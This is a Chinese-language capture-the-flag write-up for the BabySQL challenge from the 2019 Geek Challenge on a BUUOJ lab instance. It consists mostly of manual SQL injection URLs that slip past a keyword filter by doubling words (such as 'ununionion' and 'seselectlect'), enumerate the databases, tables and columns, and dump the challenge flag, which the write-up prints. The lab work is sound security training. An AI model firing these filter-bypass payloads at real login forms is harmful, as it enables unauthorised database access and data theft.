极客大挑战 2019BabySQL（手动sql注入）

[极客大挑战 2019]BabySQL，熟悉的界面，这个题的第三次变体了吧

[极客大挑战 2019]BabySQL（手动sql注入）

• [极客大挑战 2019]BabySQL，熟悉的界面，这个题的第三次变体了吧

  • 

• 试一下万能密码

• 本来打算直接抓包的，看到一位师傅，直接给双写绕过了，试了试果然有用（还把+给过滤了1=1–+用不了了）

• 接下来和原来的操作基本一样，继续手动注入【别忘了双写绕过！】

• 按照2019lovesql那个的完全一样，再试一遍

• 用order by或者union select确定字段数和回显位置

• • 

• 当前连接的数据库?username=admin&password=pwd%20%27 ununionion seselectlect 1,2,database() %23

  • 

• 查询所有的数据库

• ?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23

  • 

• 查表?username=admin&password=pwd %27 ununionion seselectlect 1,2,

• group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema=“ctf” %23只有一个flag表

  • 

• 查字段名?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name=“Flag”%23只有一个flag字段

  • 

• http://f3cee328-d0b2-4752-8cc0-7ed2f6a341f2.node3.buuoj.cn/check.php?username=admin&password=pwd%20%27%20ununionion%20seselectlect%201,2,group_concat(flag)frfromom(ctf.Flag)%23 *

• flag{f17dfb1a-8399-47b5-90fb-765faeab1fdc}